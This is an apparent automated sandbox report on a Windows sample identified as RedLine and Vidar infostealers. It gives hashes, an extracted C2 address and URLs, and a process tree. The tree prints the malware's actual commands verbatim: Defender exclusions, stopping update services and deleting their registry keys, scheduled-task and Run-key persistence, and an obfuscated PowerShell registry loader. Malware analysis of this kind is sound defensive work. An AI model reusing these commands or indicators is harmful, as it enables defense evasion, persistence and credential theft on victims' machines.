Analysis
-
max time kernel
135s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25/10/2022, 04:29
Static task
static1
Behavioral task
behavioral1
Sample
6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe
Resource
win10v2004-20220812-en
General
-
Target
6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe
-
Size
225KB
-
MD5
9ca30053b4e8d0e1f2bdddea854b8ae7
-
SHA1
148065f0c8b937734311ed60c7e7bb3566eefad7
-
SHA256
6c56b6a178c64adef96a65fab45b58a7378b17262420a31addd0ec239e12e7c7
-
SHA512
bf4e4d6b2748e9be0b4adffc221d0a60a78cbf710fa07b760cfa906fd86a9243bbab1d092d881cb0d4f60c73df03886c1f09dc85643c3ee3031858249fdd8d7f
-
SSDEEP
6144:tKRwiHSp+vV2TD862+2VahI7GDO569dOX:0Rw0MD8zGDeUOX
Malware Config
Extracted
redline
@cryptoelephant88
77.73.134.24:80
-
auth_value
db02fb4d25cd314ee038d62ab376241d
Extracted
vidar
55.2
1707
https://t.me/slivetalks
https://c.im/@xinibin420
-
profile_id
1707
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/memory/968-56-0x0000000000090000-0x00000000000B8000-memory.dmp family_redline behavioral1/memory/968-61-0x00000000000B21FE-mapping.dmp family_redline behavioral1/memory/968-63-0x0000000000090000-0x00000000000B8000-memory.dmp family_redline behavioral1/memory/968-62-0x0000000000090000-0x00000000000B8000-memory.dmp family_redline -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
pid Process 768 ofg.exe 2016 test.exe 9280 brave.exe 32608 chrome.exe 60968 svcupdater.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral1/files/0x0007000000012752-78.dat upx behavioral1/files/0x0007000000012752-80.dat upx behavioral1/memory/9280-87-0x000000013FAF0000-0x000000013FFB1000-memory.dmp upx behavioral1/memory/9280-111-0x000000013FAF0000-0x000000013FFB1000-memory.dmp upx behavioral1/files/0x0007000000012752-167.dat upx behavioral1/memory/9280-171-0x000000013FAF0000-0x000000013FFB1000-memory.dmp upx behavioral1/files/0x0008000000013445-182.dat upx behavioral1/files/0x0008000000013445-184.dat upx behavioral1/memory/61772-193-0x000000013FBB0000-0x0000000140071000-memory.dmp upx -
Loads dropped DLL 18 IoCs
pid Process 968 AppLaunch.exe 968 AppLaunch.exe 968 AppLaunch.exe 968 AppLaunch.exe 968 AppLaunch.exe 968 AppLaunch.exe 55800 WerFault.exe 55800 WerFault.exe 55800 WerFault.exe 55800 WerFault.exe 55800 WerFault.exe 61040 WerFault.exe 61040 WerFault.exe 61040 WerFault.exe 61040 WerFault.exe 61040 WerFault.exe 61040 WerFault.exe 61040 WerFault.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1376 set thread context of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 2016 set thread context of 60952 2016 test.exe 50 PID 9280 set thread context of 61544 9280 brave.exe 74 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe brave.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\GoogleUpdate.exe chrome.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 60840 sc.exe 60844 sc.exe 60784 sc.exe 61128 sc.exe 60872 sc.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 55800 32608 WerFault.exe 38 61040 2016 WerFault.exe 35 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1932 schtasks.exe 47236 SCHTASKS.exe 54420 SCHTASKS.exe 61464 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 62284 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 968 AppLaunch.exe 968 AppLaunch.exe 968 AppLaunch.exe 968 AppLaunch.exe 60748 powershell.exe 60920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 968 AppLaunch.exe Token: SeDebugPrivilege 768 ofg.exe Token: SeDebugPrivilege 60748 powershell.exe Token: SeDebugPrivilege 60968 svcupdater.exe Token: SeShutdownPrivilege 60812 powercfg.exe Token: SeShutdownPrivilege 60796 powercfg.exe Token: SeDebugPrivilege 60920 powershell.exe Token: SeShutdownPrivilege 60812 powercfg.exe Token: SeShutdownPrivilege 60844 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 1376 wrote to memory of 968 1376 6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe 28 PID 968 wrote to memory of 768 968 AppLaunch.exe 31 PID 968 wrote to memory of 768 968 AppLaunch.exe 31 PID 968 wrote to memory of 768 968 AppLaunch.exe 31 PID 968 wrote to memory of 768 968 AppLaunch.exe 31 PID 768 wrote to memory of 580 768 ofg.exe 32 PID 768 wrote to memory of 580 768 ofg.exe 32 PID 768 wrote to memory of 580 768 ofg.exe 32 PID 580 wrote to memory of 1932 580 cmd.exe 34 PID 580 wrote to memory of 1932 580 cmd.exe 34 PID 580 wrote to memory of 1932 580 cmd.exe 34 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 2016 968 AppLaunch.exe 35 PID 968 wrote to memory of 9280 968 AppLaunch.exe 37 PID 968 wrote to memory of 9280 968 AppLaunch.exe 37 PID 968 wrote to memory of 9280 968 AppLaunch.exe 37 PID 968 wrote to memory of 9280 968 AppLaunch.exe 37 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 968 wrote to memory of 32608 968 AppLaunch.exe 38 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 46592 32608 chrome.exe 39 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 47236 32608 chrome.exe 41 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 54420 32608 chrome.exe 43 PID 32608 wrote to memory of 55800 32608 chrome.exe 45 PID 32608 wrote to memory of 55800 32608 chrome.exe 45 PID 32608 wrote to memory of 55800 32608 chrome.exe 45 PID 32608 wrote to memory of 55800 32608 chrome.exe 45 PID 32608 wrote to memory of 55800 32608 chrome.exe 45 PID 32608 wrote to memory of 55800 32608 chrome.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe"C:\Users\Admin\AppData\Local\Temp\6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\system32\cmd.exe"cmd.exe" /C schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f4⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\system32\schtasks.exeschtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Creates scheduled task(s)
PID:1932
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\test.exe"C:\Users\Admin\AppData\Local\Microsoft\test.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:60952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" & exit5⤵PID:62100
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:62284
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 598964⤵
- Loads dropped DLL
- Program crash
PID:61040
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:9280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60748
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵PID:61096
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:60840
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:60844
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:60784
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:61128
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:60872
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:60784
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:61452
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:61480
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:61492
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:61508
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵PID:61112
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵PID:60812
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:60796
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:60812
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:60844
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60920 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"5⤵
- Creates scheduled task(s)
PID:61464
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
PID:61544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵PID:61556
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵PID:61676
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:32608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵PID:46592
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:47236
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:54420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32608 -s 2124⤵
- Loads dropped DLL
- Program crash
PID:55800
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3C4C680E-4B40-496D-BDA3-E6E67015CA47} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:60900
-
C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exeC:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:60968
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E5739AA8-6E01-4BB1-9C89-9670EB37E488} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:61700
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵PID:61772
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵PID:61796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵PID:61828
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{30181613-2e80-443b-a68c-6e28ab7e294f}1⤵PID:61968
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.2MB
MD5ae58e8058ae55a3dd3eefccb4a48be78
SHA109fc0b2194e8b8b5d690650057805b8966305f3e
SHA2560af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c
SHA512fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99
-
Filesize
60KB
MD5d15aaa7c9be910a9898260767e2490e1
SHA12090c53f8d9fc3fbdbafd3a1e4dc25520eb74388
SHA256f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e
SHA5127e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD51174fba1a23d039ca28aed9b45dc418c
SHA13bcfe4ee36cf233e20144a82b7114cefb9c5e9f6
SHA256fe7328bd8fd26fbf6509fe7011759e8d978903841364038ca93cb9a099a5f2c5
SHA512ae2918fe37adef67d8add805693f8cf13fbc32a3f7aea3dfa93fe9a98adf466a89221a524d079a18997f9dba42f80f1a0091865929fe17bdc57f1b08d05afaac
-
Filesize
3.2MB
MD5872358b05cc08ca705a1a7592c23ecdf
SHA1388dd6811a9459a2dbc78bdf38ef0477ca5b0704
SHA256054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15
SHA512bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a
-
Filesize
3.2MB
MD5872358b05cc08ca705a1a7592c23ecdf
SHA1388dd6811a9459a2dbc78bdf38ef0477ca5b0704
SHA256054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15
SHA512bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a
-
Filesize
725KB
MD53b21c52f7bf1f84b356020af8c9b3c45
SHA138f56daaa3dc98c233c1abcce1a5a864a49da66b
SHA256a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279
SHA512445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0
-
Filesize
7KB
MD5b491f711272344f719ee13d98ff337bf
SHA1f6f621d78adba380fd5da1e5b20e51b10e072d5f
SHA256453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2
SHA512fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f
-
Filesize
7KB
MD5b491f711272344f719ee13d98ff337bf
SHA1f6f621d78adba380fd5da1e5b20e51b10e072d5f
SHA256453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2
SHA512fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f
-
Filesize
1.3MB
MD50688e13f50cad69b7857ff50be40b6f9
SHA1237e7880a8c65c15aca803ead6c8b98bb3f84ef1
SHA256afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf
SHA512a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD523b38ab78e0b006f338dc9b53f7483a6
SHA19f3bbff2d05fe1f43a2164fb87588d155bf12e0f
SHA2565ebbaa3c071e76bd195ebf8a6cecc33944f222a919732a32b29d89ba654ca10a
SHA512b20cf37049a328e45139f4d46c775c53fb3d7d78be2da0964fb81392a8bdace85557031cc7f8cffaa00bf57fc6d18750240693d9cb0da5e7eccfcff4b4188e04
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD523b38ab78e0b006f338dc9b53f7483a6
SHA19f3bbff2d05fe1f43a2164fb87588d155bf12e0f
SHA2565ebbaa3c071e76bd195ebf8a6cecc33944f222a919732a32b29d89ba654ca10a
SHA512b20cf37049a328e45139f4d46c775c53fb3d7d78be2da0964fb81392a8bdace85557031cc7f8cffaa00bf57fc6d18750240693d9cb0da5e7eccfcff4b4188e04
-
Filesize
7KB
MD5b491f711272344f719ee13d98ff337bf
SHA1f6f621d78adba380fd5da1e5b20e51b10e072d5f
SHA256453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2
SHA512fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f
-
Filesize
7KB
MD5b491f711272344f719ee13d98ff337bf
SHA1f6f621d78adba380fd5da1e5b20e51b10e072d5f
SHA256453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2
SHA512fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f
-
Filesize
1KB
MD5ef412c79fe946bc2afa8f1adfd734d1a
SHA15fb96b86f1cbf84c9a9556dc435cc334097767f0
SHA2560b93be5a8be37ba42f5ea5fdc86de25238429c4ddd4e8202d64406c9d11e7721
SHA512c69df9f909b146e15b1608bc7295a6e3a38f180fdc0914c730fd09991e9ff82ed132f94846536a7111cc14a87faee24896a5588a255f18e4ccf5d9340d715da7
-
Filesize
3.2MB
MD5ae58e8058ae55a3dd3eefccb4a48be78
SHA109fc0b2194e8b8b5d690650057805b8966305f3e
SHA2560af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c
SHA512fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1.1MB
MD51f44d4d3087c2b202cf9c90ee9d04b0f
SHA1106a3ebc9e39ab6ddb3ff987efb6527c956f192d
SHA2564841020c8bd06b08fde6e44cbe2e2ab33439e1c8368e936ec5b00dc0584f7260
SHA512b614c72a3c1ce681ebffa628e29aa50275cc80ca9267380960c5198ea4d0a3f2df6cfb7275491d220bad72f14fc94e6656501e9a061d102fb11e00cfda2beb45
-
Filesize
3.2MB
MD5872358b05cc08ca705a1a7592c23ecdf
SHA1388dd6811a9459a2dbc78bdf38ef0477ca5b0704
SHA256054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15
SHA512bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a
-
Filesize
725KB
MD53b21c52f7bf1f84b356020af8c9b3c45
SHA138f56daaa3dc98c233c1abcce1a5a864a49da66b
SHA256a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279
SHA512445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0
-
Filesize
725KB
